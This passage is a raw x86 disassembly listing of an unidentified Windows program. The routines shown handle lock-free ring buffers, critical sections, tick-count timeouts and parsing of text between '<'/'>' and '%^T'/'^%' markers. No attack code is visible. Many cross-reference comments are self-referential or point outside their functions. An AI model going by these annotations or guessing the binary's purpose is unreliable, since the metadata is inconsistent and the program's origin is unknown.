lea ecx, [ebx+28h]
call sub_40DB00
loc_401A2A: ; CODE XREF: loc_401A2A+29 j
; sub_401918+34 j
push 1
push 64h
push dword ptr [ebx]
call WaitForSingleObjectEx ; df--HS
test eax, eax
jnz loc_401920
loc_401A3A: ; CODE XREF: loc_401A3A+18 j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn 4
sub_401918 endp
; =============== S U B R O U T I N E =======================================
sub_401A43 proc near ; CODE XREF: sub_401A43+86 p
push ebx
push esi
push edi
push 1
mov esi, ecx
call sub_4012FC
push 1
lea ecx, [esi+4]
call sub_4012FC
xor ebx, ebx
mov [esi+14h], ebx
mov [esi+10h], ebx
mov [esi+0Ch], ebx
lea edi, [esi+18h]
lea ecx, [esi+28h]
mov [edi+0Ch], ebx
mov [edi+8], ebx
mov [edi+4], ebx
call sub_40DB48
mov dword ptr [esi+14h], offset sub_4017C3
mov [esi+10h], esi
mov [esi+0Ch], ebx
push ebx
mov ecx, edi
mov dword ptr [edi+0Ch], offset sub_401918
mov [edi+8], esi
mov [edi+4], ebx
call sub_40174B
pop edi
mov eax, esi
pop esi
pop ebx
retn
sub_401A43 endp
; =============== S U B R O U T I N E =======================================
sub_401AA0 proc near ; CODE XREF: sub_401AA0+22A p
; sub_402FCB+32 p ...
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
call sub_40CD83
pop ecx
push eax
push [esp+8+arg_0]
mov ecx, esi
call sub_40DBA2
pop esi
retn 4
sub_401AA0 endp
; =============== S U B R O U T I N E =======================================
sub_401ABD proc near ; CODE XREF: sub_401ABD+28 p
; sub_409588+30 p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push dword ptr [ecx]
call sub_40CD44
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
retn 4
sub_401ABD endp
; =============== S U B R O U T I N E =======================================
sub_401AD2 proc near ; CODE XREF: sub_401AD2+16 p
push esi
mov esi, ecx
lea ecx, [esi+4]
call sub_40DB48
and dword ptr [esi+8], 0
mov eax, esi
pop esi
retn
sub_401AD2 endp
; =============== S U B R O U T I N E =======================================
sub_401AE5 proc near ; CODE XREF: sub_401AE5+47 p
; sub_402400+84 p ...
push esi
mov esi, ecx
lea ecx, [esi+8]
call sub_40DB59
lea ecx, [esi+4]
pop esi
jmp sub_40DB59
sub_401AE5 endp
; =============== S U B R O U T I N E =======================================
sub_401AF9 proc near ; CODE XREF: sub_401AF9+55 p
; sub_402512+16 p
push esi
mov esi, ecx
lea ecx, [esi+4]
call sub_40DB48
lea ecx, [esi+8]
call sub_40DB48
mov eax, esi
pop esi
retn
sub_401AF9 endp
; =============== S U B R O U T I N E =======================================
sub_401B10 proc near ; CODE XREF: sub_401B10+85 p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_8]
mov eax, [eax]
push ebx
push esi
mov esi, ecx
mov ecx, [esp+8+arg_4]
push edi
mov edi, [ecx]
mov ecx, [esp+0Ch+arg_0]
mov ebx, [ecx]
push eax
call sub_40CE59
pop ecx
push eax
push edi
push ebx
lea ecx, [esi+14h]
call sub_409588
pop edi
pop esi
pop ebx
retn 0Ch
sub_401B10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B3F proc near ; CODE XREF: sub_401B3F+1FD p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
xor eax, eax
cmp [ebp+arg_8], ebx
jz short loc_401B5C
mov ecx, [ebp+arg_0]
push ebx
push [ebp+arg_8]
call sub_40DB2F
cmp eax, ebx
jz short loc_401B93
loc_401B5C: ; CODE XREF: loc_401B5C+B j
mov ecx, [ebp+arg_0]
push esi
push eax
push offset asc_41820C ; "<"
call sub_40DB2F
mov esi, eax
cmp esi, ebx
jz short loc_401B92
mov ecx, [ebp+arg_0]
inc esi
push esi
push offset asc_418208 ; ">"
call sub_40DB2F
cmp eax, ebx
jz short loc_401B92
mov ecx, [ebp+arg_4]
sub eax, esi
push eax
push esi
call sub_40DB5E
mov bl, 1
loc_401B92: ; CODE XREF: loc_401B92+30 j
; sub_401B3F+43 j
pop esi
loc_401B93: ; CODE XREF: loc_401B93+1B j
mov al, bl
pop ebx
pop ebp
retn 0Ch
sub_401B3F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B9A proc near ; CODE XREF: sub_401B9A+1C8 p
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push esi
mov esi, [ebp+arg_0]
push edi
push 0
push [ebp+arg_4]
mov ecx, esi
mov [ebp+var_1], 0
call sub_40DB2F
mov edi, eax
test edi, edi
jz short loc_401C26
lea ecx, [ebp+arg_4]
call sub_40DB48
push edi
push offset asc_41820C ; "<"
mov ecx, esi
call sub_40DB2F
mov edi, eax
test edi, edi
jz short loc_401C1E
mov eax, [esi]
mov ecx, edi
sub ecx, eax
inc ecx
push ecx
push eax
lea ecx, [ebp+arg_4]
call sub_40DB5E
push 0
push [ebp+arg_8]
lea ecx, [ebp+arg_4]
call sub_40DBA2
inc edi
push edi
push offset asc_418208 ; ">"
mov ecx, esi
call sub_40DB2F
test eax, eax
lea ecx, [ebp+arg_4]
jz short loc_401C21
push 0
push eax
call sub_40DBA2
lea eax, [ebp+arg_4]
push eax
mov ecx, esi
call sub_40DC39
mov [ebp+var_1], 1
loc_401C1E: ; CODE XREF: loc_401C1E+38 j
lea ecx, [ebp+arg_4]
loc_401C21: ; CODE XREF: loc_401C21+6B j
call sub_40DB59
loc_401C26: ; CODE XREF: loc_401C26+1D j
mov al, [ebp+var_1]
pop edi
pop esi
leave
retn 0Ch
sub_401B9A endp
; =============== S U B R O U T I N E =======================================
sub_401C2F proc near ; CODE XREF: sub_401C2F+35 p
push esi
xor eax, eax
mov esi, ecx
push 2000h
push eax
mov [esi+2004h], eax
push esi
mov [esi+2000h], eax
call sub_40CCD9
add esp, 0Ch
mov eax, esi
pop esi
retn
sub_401C2F endp
; =============== S U B R O U T I N E =======================================
sub_401C53 proc near ; CODE XREF: sub_401C53+1C p
; sub_4022BE+81 p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov ebx, ecx
push edi
lea ebp, [ebx+2000h]
loc_401C5F: ; CODE XREF: loc_401C5F+43 j
mov esi, [ebp+0]
xor edi, edi
loc_401C64: ; CODE XREF: loc_401C64+36 j
push 0
push [esp+14h+arg_0]
lea eax, [edi+esi]
and eax, 7FFh
lea eax, [ebx+eax*4]
push eax
call InterlockedCompareExchange
test eax, eax
jz short loc_401C98
cmp edi, 800h
jz short loc_401C8B
inc edi
jmp short loc_401C64
; ---------------------------------------------------------------------------
loc_401C8B: ; CODE XREF: loc_401C8B+33 j
push 3E8h
call Sleep
jmp short loc_401C5F
; ---------------------------------------------------------------------------
loc_401C98: ; CODE XREF: loc_401C98+2B j
push ebp
call InterlockedIncrement
pop edi
pop esi
pop ebp
pop ebx
retn 4
sub_401C53 endp
; =============== S U B R O U T I N E =======================================
sub_401CA6 proc near ; CODE XREF: sub_401CA6+92 p
; .text:00402AA2 p
push esi
lea esi, [ecx+2004h]
mov eax, [esi]
and eax, 7FFh
lea eax, [ecx+eax*4]
push edi
mov edi, [eax]
test edi, edi
jz short loc_401CD7
push edi
push 0
push eax
call InterlockedCompareExchange
test eax, eax
jz short loc_401CD7
push esi
call InterlockedIncrement
mov eax, edi
jmp short loc_401CD9
; ---------------------------------------------------------------------------
loc_401CD7: ; CODE XREF: loc_401CD7+16 j
; sub_401CA6+24 j
xor eax, eax
loc_401CD9: ; CODE XREF: loc_401CD9+2F j
pop edi
pop esi
retn
sub_401CA6 endp
; =============== S U B R O U T I N E =======================================
sub_401CDC proc near ; CODE XREF: sub_401CDC+40 p
push esi
xor eax, eax
mov esi, ecx
push 3000h
push eax
mov [esi+3004h], eax
push esi
mov [esi+3000h], eax
call sub_40CCD9
add esp, 0Ch
mov eax, esi
pop esi
retn
sub_401CDC endp
; =============== S U B R O U T I N E =======================================
sub_401D00 proc near ; CODE XREF: sub_401D00+20 p
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
push ebx
push ebp
mov ebp, ds:dword_4180D0
push esi
mov esi, ecx
lea eax, [esi+3000h]
push edi
mov edi, [eax]
xor ebx, ebx
mov [esp+14h+var_4], eax
push ebx
mov eax, edi
jmp short loc_401D2E
; ---------------------------------------------------------------------------
loc_401D20: ; CODE XREF: loc_401D20+43 j
cmp ebx, 0C00h
jz short loc_401D59
inc ebx
push 0
lea eax, [ebx+edi]
loc_401D2E: ; CODE XREF: loc_401D2E+1E j
xor edx, edx
mov ecx, 0C00h
div ecx
push [esp+18h+arg_0]
lea eax, [esi+edx*4]
push eax
call InterlockedCompareExchange ; df--SH
test eax, eax
jnz short loc_401D20
push [esp+14h+var_4]
call InterlockedIncrement
mov al, 1
loc_401D51: ; CODE XREF: loc_401D51+5B j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn 4
; ---------------------------------------------------------------------------
loc_401D59: ; CODE XREF: loc_401D59+26 j
xor al, al
jmp short loc_401D51
sub_401D00 endp
; =============== S U B R O U T I N E =======================================
sub_401D5D proc near ; CODE XREF: sub_401D5D+4A p
; sub_402400+B5 p
push esi
push edi
lea esi, [ecx+3004h]
mov eax, [esi]
xor edx, edx
mov edi, 0C00h
div edi
lea eax, [ecx+edx*4]
mov edi, [eax]
test edi, edi
jz short loc_401D92
push edi
push 0
push eax
call InterlockedCompareExchange
test eax, eax
jz short loc_401D92
push esi
call InterlockedIncrement
mov eax, edi
jmp short loc_401D94
; ---------------------------------------------------------------------------
loc_401D92: ; CODE XREF: loc_401D92+1A j
; sub_401D5D+28 j
xor eax, eax
loc_401D94: ; CODE XREF: loc_401D94+33 j
pop edi
pop esi
retn
sub_401D5D endp
; =============== S U B R O U T I N E =======================================
sub_401D97 proc near ; CODE XREF: sub_401D97+19F p
push esi
mov esi, ecx
push edi
mov edi, [esi]
test edi, edi
jz short loc_401DB2
mov ecx, edi
call sub_402BDD
push edi
call sub_40D0B6
and dword ptr [esi], 0
pop ecx
loc_401DB2: ; CODE XREF: loc_401DB2+8 j
pop edi
pop esi
retn
sub_401D97 endp
; =============== S U B R O U T I N E =======================================
sub_401DB5 proc near ; CODE XREF: sub_401DB5+76 p
; sub_402400+6B p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push ebx
mov ebx, [eax+4]
push ebp
push esi
mov esi, [eax+8]
push edi
mov edi, [eax+0Ch]
push eax
mov ebp, ecx
call sub_40D0B6
test esi, esi
pop ecx
jz short loc_401DD6
mov [esi+0Ch], edi
loc_401DD6: ; CODE XREF: loc_401DD6+1C j
test edi, edi
jz short loc_401DDF
mov [edi+8], esi
jmp short loc_401DE2
; ---------------------------------------------------------------------------
loc_401DDF: ; CODE XREF: loc_401DDF+23 j
mov [ebp+0], esi
loc_401DE2: ; CODE XREF: loc_401DE2+28 j
pop edi
pop esi
pop ebp
mov eax, ebx
pop ebx
retn 4
sub_401DB5 endp
; =============== S U B R O U T I N E =======================================
sub_401DEB proc near ; CODE XREF: sub_401DEB+C p
push esi
mov esi, ecx
lea ecx, [esi+4]
call sub_40DB59
mov ecx, esi
pop esi
jmp sub_401205
sub_401DEB endp
; =============== S U B R O U T I N E =======================================
sub_401DFE proc near ; CODE XREF: sub_401DFE+FD p
; sub_402400+53 p
push esi
push edi
mov edi, ecx
mov esi, [edi+8]
test esi, esi
jz short loc_401E17
mov ecx, esi
call sub_402BDD
push esi
call sub_40D0B6
pop ecx
loc_401E17: ; CODE XREF: loc_401E17+9 j
lea ecx, [edi+4]
pop edi
pop esi
jmp sub_40DB59
sub_401DFE endp
; =============== S U B R O U T I N E =======================================
sub_401E21 proc near ; CODE XREF: sub_401E21+F p
push ebx
push esi
push edi
mov esi, ecx
push dword ptr [esi+50A0h]
call SetEvent
lea ecx, [esi+5090h]
call sub_40B150
xor ebx, ebx
xor edi, edi
cmp [esi+508Ch], ebx
jbe short loc_401E62
loc_401E49: ; CODE XREF: loc_401E49+3F j
mov ecx, [esi+5088h]
add ecx, ebx
call sub_40B150
inc edi
add ebx, 10h
cmp edi, [esi+508Ch]
jb short loc_401E49
loc_401E62: ; CODE XREF: loc_401E62+26 j
pop edi
pop esi
pop ebx
retn
sub_401E21 endp
; =============== S U B R O U T I N E =======================================
sub_401E66 proc near ; CODE XREF: sub_401E66+400 p
arg_0 = dword ptr 4
push esi
mov esi, ecx
call GetTickCount
mov ecx, [esp+4+arg_0]
inc dword ptr [ecx+10h]
cmp dword ptr [ecx+10h], 3
mov [ecx+0Ch], eax
jge short loc_401E93
push ecx
lea ecx, [esi+205Ch]
call sub_401D00
test al, al
jz short loc_401E93
mov al, 1
jmp short loc_401E95
; ---------------------------------------------------------------------------
loc_401E93: ; CODE XREF: loc_401E93+17 j
; sub_401E66+27 j
xor al, al
loc_401E95: ; CODE XREF: loc_401E95+2B j
pop esi
retn 4
sub_401E66 endp
; =============== S U B R O U T I N E =======================================
sub_401E99 proc near ; CODE XREF: sub_401E99+1CF p
push esi
mov esi, ecx
cmp dword ptr [esi+5064h], 0
jnz short loc_401EA9
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_401EA9: ; CODE XREF: loc_401EA9+A j
cmp dword ptr [esi+5080h], 0C800h
jg short loc_401ECC
call GetTickCount
sub eax, [esi+5084h]
cmp eax, 0DBBA0h
ja short loc_401ECC
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_401ECC: ; CODE XREF: loc_401ECC+1A j
; sub_401E99+2D j
xor eax, eax
inc eax
pop esi
retn
sub_401E99 endp
; =============== S U B R O U T I N E =======================================
sub_401ED1 proc near ; CODE XREF: sub_401ED1+53 p
arg_0 = dword ptr 4
push esi
mov esi, ecx
mov eax, [esi+2000h]
push edi
lea edi, [esi+2004h]
mov ecx, [edi]
cmp eax, ecx
jnz short loc_401EF4
push [esp+8+arg_0]
mov ecx, esi
call sub_401C53
jmp short loc_401F39
; ---------------------------------------------------------------------------
loc_401EF4: ; CODE XREF: loc_401EF4+14 j
push ebx
push ebp
loc_401EF6: ; CODE XREF: loc_401EF6+5D j
mov eax, [edi]
xor ebp, ebp
mov ebx, eax
loc_401EFC: ; CODE XREF: loc_401EFC+50 j
push 0
push [esp+14h+arg_0]
mov eax, ebx
and eax, 7FFh
lea eax, [esi+eax*4]
push eax
call InterlockedCompareExchange
test eax, eax
jz short loc_401F30
cmp ebp, 800h
jz short loc_401F23
inc ebp
dec ebx
jmp short loc_401EFC
; ---------------------------------------------------------------------------
loc_401F23: ; CODE XREF: loc_401F23+4C j
push 3E8h
call Sleep
jmp short loc_401EF6
; ---------------------------------------------------------------------------
loc_401F30: ; CODE XREF: loc_401F30+44 j
push edi
call InterlockedDecrement
pop ebp
pop ebx
loc_401F39: ; CODE XREF: loc_401F39+21 j
pop edi
pop esi
retn 4
sub_401ED1 endp
; =============== S U B R O U T I N E =======================================
sub_401F3E proc near ; CODE XREF: sub_401F3E+76 p
; sub_402624+58 p ...
arg_0 = dword ptr 4
push esi
push edi
mov esi, ecx
lea edi, [esi+4]
push edi
call EnterCriticalSection
push [esp+8+arg_0]
mov ecx, esi
call sub_408DA2
test eax, eax
jz short loc_401F6C
mov esi, [eax+4]
loc_401F5E: ; CODE XREF: loc_401F5E+30 j
push edi
call LeaveCriticalSection
pop edi
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_401F6C: ; CODE XREF: loc_401F6C+1B j
xor esi, esi
jmp short loc_401F5E
sub_401F3E endp
; =============== S U B R O U T I N E =======================================
sub_401F70 proc near ; CODE XREF: sub_401F70+9 p
; sub_40235F+60 p ...
mov eax, [ecx]
test eax, eax
jz short locret_401F84
and dword ptr [ecx], 0
and dword ptr [ecx+4], 0
push eax
call sub_40CCC5
pop ecx
locret_401F84: ; CODE XREF: locret_401F84+4 j
retn
sub_401F70 endp
; =============== S U B R O U T I N E =======================================
sub_401F85 proc near ; CODE XREF: sub_401F85+C p
; sub_402624+DB p ...
push esi
mov esi, ecx
cmp dword ptr [esi], 0
jz short loc_401FB6
push edi
xor edi, edi
cmp [esi+4], edi
jbe short loc_401FA5
loc_401F95: ; CODE XREF: loc_401F95+1E j
mov eax, [esi]
lea ecx, [eax+edi*4]
call sub_40DB59
inc edi
cmp edi, [esi+4]
jb short loc_401F95
loc_401FA5: ; CODE XREF: loc_401FA5+E j
mov eax, [esi]
and dword ptr [esi], 0
and dword ptr [esi+4], 0
push eax
call sub_40CCC5
pop ecx
pop edi
loc_401FB6: ; CODE XREF: loc_401FB6+6 j
pop esi
retn
sub_401F85 endp
; =============== S U B R O U T I N E =======================================
sub_401FB8 proc near ; CODE XREF: sub_401FB8+16B p
push esi
push edi
mov esi, ecx
xor edi, edi
cmp [esi+508Ch], edi
jbe short loc_401FE5
push ebx
xor ebx, ebx
loc_401FC9: ; CODE XREF: loc_401FC9+2A j
mov ecx, [esi+5088h]
push 0
add ecx, ebx
call sub_40174B
inc edi
add ebx, 10h
cmp edi, [esi+508Ch]
jb short loc_401FC9
pop ebx
loc_401FE5: ; CODE XREF: loc_401FE5+C j
push 0
lea ecx, [esi+5090h]
call sub_40174B
pop edi
pop esi
retn
sub_401FB8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401FF5 proc near ; CODE XREF: sub_401FF5+75 p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push esi
push 0Ch
mov [ebp+var_4], ecx
call sub_40D0BB
test eax, eax
pop ecx
jz short loc_402014
mov ecx, eax
call sub_401AD2
mov esi, eax
jmp short loc_402016
; ---------------------------------------------------------------------------
loc_402014: ; CODE XREF: loc_402014+12 j
xor esi, esi
loc_402016: ; CODE XREF: loc_402016+1D j
mov eax, [ebp+arg_4]
push ebx
push edi
mov edi, [ebp+arg_8]
push 0
mov [esi], eax
push dword ptr [edi]
lea ebx, [esi+4]
mov ecx, ebx
call sub_40DB5E
and dword ptr [esi+8], 0
push 0
push offset aT ; "%^T"
mov ecx, edi
call sub_40DB2F
mov edi, eax
test edi, edi
jz loc_4020D9
add edi, 3
push edi
push offset asc_418214 ; "^%"
mov ecx, ebx
call sub_40DB2F
test eax, eax
jz short loc_4020D9
sub eax, edi
mov ebx, eax
push ebx
call sub_40D0BB
lea ecx, [ebp+arg_8]
push ecx
push eax
push ebx
push edi
mov [ebp+arg_4], eax
mov [ebp+arg_8], ebx
call sub_40C4D1
add esp, 14h
test al, al
jnz short loc_40208C
cmp [ebp+arg_4], 0
jz short loc_4020D9
push [ebp+arg_4]
jmp short loc_4020D3
; ---------------------------------------------------------------------------
loc_40208C: ; CODE XREF: loc_40208C+8A j
push 2Ch
call sub_40D0BB
test eax, eax
pop ecx
jz short loc_4020A3
mov ecx, eax
call sub_402BAC
mov edi, eax
jmp short loc_4020A5
; ---------------------------------------------------------------------------
loc_4020A3: ; CODE XREF: loc_4020A3+A1 j
xor edi, edi
loc_4020A5: ; CODE XREF: loc_4020A5+AC j
push [ebp+arg_8]
mov ebx, [ebp+arg_4]
push ebx
mov ecx, edi
call sub_402C86
test al, al
jnz short loc_4020CB
test edi, edi
jz short loc_4020CE
mov ecx, edi
call sub_402BDD
push edi
call sub_40D0B6
pop ecx
jmp short loc_4020CE
; ---------------------------------------------------------------------------
loc_4020CB: ; CODE XREF: loc_4020CB+C0 j
mov [esi+8], edi
loc_4020CE: ; CODE XREF: loc_4020CE+C4 j
; sub_401FF5+D4 j
test ebx, ebx
jz short loc_4020D9
push ebx
loc_4020D3: ; CODE XREF: loc_4020D3+95 j
call sub_40D0B6
pop ecx
loc_4020D9: ; CODE XREF: loc_4020D9+4F j
; sub_401FF5+67 j ...
mov ecx, [ebp+var_4]
push esi
push [ebp+arg_0]
add ecx, 38h
call sub_408F07
mov esi, eax
test esi, esi
pop edi
pop ebx
jz short loc_4020FE
mov ecx, esi
call sub_401DFE
push esi
call sub_40D0B6
pop ecx
loc_4020FE: ; CODE XREF: loc_4020FE+F9 j
pop esi
leave
retn 0Ch
sub_401FF5 endp
; =============== S U B R O U T I N E =======================================
sub_402103 proc near ; DATA XREF: sub_402103+A1 o
push ebp
mov ebp, ds:dword_4180B0
push esi
push 1
mov esi, ecx
push 64h
push dword ptr [esi+50A0h]
call WaitForSingleObjectEx ; df--HS
test eax, eax
jz short loc_40216D
push ebx
push edi
lea edi, [esi+205Ch]
loc_402125: ; CODE XREF: loc_402125+66 j
mov eax, [edi+3004h]
xor edx, edx
mov ecx, 0C00h
div ecx
mov ebx, [edi+edx*4]
test ebx, ebx
jz short loc_40215B
call GetTickCount
sub eax, [ebx+0Ch]
cmp eax, 927C0h
jbe short loc_40215B
mov ecx, edi
call sub_401D5D
push eax
lea ecx, [esi+54h]
call sub_401ED1
loc_40215B: ; CODE XREF: loc_40215B+36 j
; sub_402103+46 j
push 1
push 64h
push dword ptr [esi+50A0h]
call WaitForSingleObjectEx ; df--HS
test eax, eax
jnz short loc_402125
pop edi
pop ebx
loc_40216D: ; CODE XREF: loc_40216D+18 j
pop esi
pop ebp
retn 4
sub_402103 endp
; =============== S U B R O U T I N E =======================================
sub_402172 proc near ; CODE XREF: sub_402172+10 p
arg_0 = dword ptr 4
push esi
mov esi, ecx
cmp dword ptr [esi], 0
push edi
jz short loc_402180
call sub_401F70
loc_402180: ; CODE XREF: loc_402180+7 j
mov edi, [esp+8+arg_0]
mov eax, edi
shl eax, 4
push 1
push eax
call sub_40CA2C
test eax, eax
pop ecx
pop ecx
mov [esi], eax
jz short loc_40219C
mov [esi+4], edi
loc_40219C: ; CODE XREF: loc_40219C+25 j
pop edi
pop esi
retn 4
sub_402172 endp
; =============== S U B R O U T I N E =======================================
sub_4021A1 proc near ; CODE XREF: sub_4021A1+2B4 p
; sub_402624+40C p ...
push esi
mov esi, ecx
push edi
mov edi, [esi]
test edi, edi
jz short loc_4021BC
mov ecx, edi
call sub_401DEB
push edi
call sub_40D0B6
and dword ptr [esi], 0
pop ecx
loc_4021BC: ; CODE XREF: loc_4021BC+8 j
pop edi
pop esi
retn
sub_4021A1 endp
; =============== S U B R O U T I N E =======================================
sub_4021BF proc near ; CODE XREF: sub_4021BF+25 p
push esi
mov esi, ecx
lea eax, [esi+0Ch]
mov dword ptr [esi], offset off_41821C
and dword ptr [esi+4], 0
and dword ptr [esi+8], 0
push eax
call InitializeCriticalSection
mov eax, esi
pop esi
retn
sub_4021BF endp
; =============== S U B R O U T I N E =======================================
sub_4021DE proc near ; CODE XREF: sub_4021DE+21 p
push esi
mov esi, ecx
push edi
lea ecx, [esi+4]
mov dword ptr [esi], offset off_418220
call sub_401202
lea ecx, [esi+8]
call sub_40DB48
lea ecx, [esi+0Ch]
call sub_40DB48
lea ecx, [esi+14h]
call sub_4021BF
lea ecx, [esi+38h]
call sub_408D8E
lea ecx, [esi+54h]
call sub_401C2F
lea ecx, [esi+205Ch]
call sub_401CDC
lea ecx, [esi+5064h]
call sub_408D8E
xor edi, edi
mov [esi+5080h], edi
call GetTickCount
mov [esi+5084h], eax
lea eax, [esi+5088h]
mov [eax], edi
mov [eax+4], edi
push 1
lea ecx, [esi+50A0h]
mov [esi+509Ch], edi
mov [esi+5098h], edi
mov [esi+5094h], edi
call sub_4012FC
lea eax, [esi+50ACh]
push eax
call InitializeCriticalSection
mov [esi+5094h], edi
mov dword ptr [esi+509Ch], offset sub_402103
mov [esi+5098h], esi
mov [esi+50A4h], edi
mov [esi+50A8h], edi
pop edi
mov eax, esi
pop esi
retn
sub_4021DE endp
; =============== S U B R O U T I N E =======================================
sub_4022A0 proc near ; CODE XREF: sub_4022A0+97 p
; sub_403ED0+17E p ...
push esi
mov esi, ecx
push edi
mov edi, [esi]
test edi, edi
jz short loc_4022BB
mov ecx, edi
call sub_401F85
push edi
call sub_40D0B6
and dword ptr [esi], 0
pop ecx
loc_4022BB: ; CODE XREF: loc_4022BB+8 j
pop edi
pop esi
retn
sub_4022A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4022BE proc near ; CODE XREF: sub_4022BE+67 p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
mov [ebp+var_4], ecx
mov ecx, [ebp+arg_4]
push offset asc_418210 ; "\n"
call sub_40DD00
mov edi, eax
mov ecx, [edi+4]
xor eax, eax
test ecx, ecx
mov [ebp+var_C], edi
mov [ebp+arg_4], eax
mov [ebp+var_8], ecx
jbe short loc_402352
push ebx
push esi
loc_4022EB: ; CODE XREF: loc_4022EB+90 j
mov ebx, eax
mov eax, [edi]
shl ebx, 2
add eax, ebx
mov eax, [eax]
test eax, eax
jz short loc_402344
push eax
call sub_40CD83
test eax, eax
pop ecx
jbe short loc_402344
push 14h
call sub_40D0BB
test eax, eax
pop ecx
jz short loc_40231C
mov ecx, eax
call sub_401AF9
mov esi, eax
jmp short loc_40231E
; ---------------------------------------------------------------------------
loc_40231C: ; CODE XREF: loc_40231C+51 j
xor esi, esi
loc_40231E: ; CODE XREF: loc_40231E+5C j
mov eax, [ebp+arg_0]
mov [esi], eax
mov eax, [edi]
add eax, ebx
push eax
lea ecx, [esi+4]
call sub_40DC39
mov ecx, [ebp+var_4]
and dword ptr [esi+0Ch], 0
and dword ptr [esi+10h], 0
push esi
add ecx, 54h
call sub_401C53
loc_402344: ; CODE XREF: loc_402344+3A j
; sub_4022BE+45 j
mov eax, [ebp+arg_4]
inc eax
cmp eax, [ebp+var_8]
mov [ebp+arg_4], eax
jb short loc_4022EB
pop esi
pop ebx
loc_402352: ; CODE XREF: loc_402352+29 j
lea ecx, [ebp+var_C]
call sub_4022A0
pop edi
leave
retn 8
sub_4022BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40235F proc near ; CODE XREF: sub_40235F+25 p
; sub_405440+1F3 p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
mov ebx, ecx
push edi
lea eax, [ebp+var_8]
lea ecx, [ebx+5064h]
push eax
mov [ebp+var_4], ebx
call sub_408761
mov edi, [ebp+var_8]
test edi, edi
jz short loc_4023E1
push esi
loc_402382: ; CODE XREF: loc_402382+7F j
test edi, edi
jz short loc_40238B
mov esi, [edi+4]
jmp short loc_40238D
; ---------------------------------------------------------------------------
loc_40238B: ; CODE XREF: loc_40238B+25 j
xor esi, esi
loc_40238D: ; CODE XREF: loc_40238D+2A j
mov eax, [esi+4]
test eax, eax
jbe short loc_4023BD
xor ebx, ebx
test eax, eax
jbe short loc_4023BA
loc_40239A: ; CODE XREF: loc_40239A+59 j
mov eax, [esi]
mov ecx, [eax+ebx*4]
test ecx, ecx
mov [ebp+var_8], ecx
jz short loc_4023B4
call sub_401AE5
push [ebp+var_8]
call sub_40D0B6
pop ecx
loc_4023B4: ; CODE XREF: loc_4023B4+45 j
inc ebx
cmp ebx, [esi+4]
jb short loc_40239A
loc_4023BA: ; CODE XREF: loc_4023BA+39 j
mov ebx, [ebp+var_4]
loc_4023BD: ; CODE XREF: loc_4023BD+33 j
mov ecx, esi
call sub_401F70
push esi
call sub_40D0B6
mov esi, [edi+8]
pop ecx
push edi
lea ecx, [ebx+5064h]
call sub_401DB5
test esi, esi
mov edi, esi
jnz short loc_402382
pop esi
loc_4023E1: ; CODE XREF: loc_4023E1+20 j
push 0
lea eax, [ebx+5080h]
push eax
call InterlockedExchange
call GetTickCount
pop edi
mov [ebx+5084h], eax
pop ebx
leave
retn
sub_40235F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402400 proc near ; CODE XREF: sub_402400+7C p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, ecx
push edi
mov dword ptr [esi], offset off_418220
call sub_401E21
mov edi, ds:dword_4180DC
lea ebx, [esi+5068h]
push ebx
call EnterCriticalSection ; df--HS
mov ecx, esi
call sub_40235F
push ebx
mov ebx, ds:dword_4180E0
call LeaveCriticalSection ; df--HS
lea eax, [esi+3Ch]
push eax
call EnterCriticalSection ; df--HS
lea eax, [ebp+var_4]
lea ecx, [esi+38h]
push eax
call sub_408761
jmp short loc_402470
; ---------------------------------------------------------------------------
loc_402447: ; CODE XREF: loc_402447+75 j
mov eax, [edi+4]
mov ecx, eax
test ecx, ecx
mov [ebp+var_4], eax
jz short loc_402461
call sub_401DFE
push [ebp+var_4]
call sub_40D0B6
pop ecx
loc_402461: ; CODE XREF: loc_402461+51 j
mov eax, [edi+8]
push edi
lea ecx, [esi+38h]
mov [ebp+var_4], eax
call sub_401DB5
loc_402470: ; CODE XREF: loc_402470+45 j
mov edi, [ebp+var_4]
test edi, edi
jnz short loc_402447
lea eax, [esi+3Ch]
push eax
call ebx
lea edi, [esi+54h]
jmp short loc_402490
; ---------------------------------------------------------------------------
loc_402482: ; CODE XREF: loc_402482+9B j
mov ecx, ebx
call sub_401AE5
push ebx
call sub_40D0B6
pop ecx
loc_402490: ; CODE XREF: loc_402490+80 j
mov ecx, edi
call sub_401CA6
mov ebx, eax
test ebx, ebx
jnz short loc_402482
lea ebx, [esi+205Ch]
jmp short loc_4024B3
; ---------------------------------------------------------------------------
loc_4024A5: ; CODE XREF: loc_4024A5+BE j
mov ecx, edi
call sub_401AE5
push edi
call sub_40D0B6
pop ecx
loc_4024B3: ; CODE XREF: loc_4024B3+A3 j
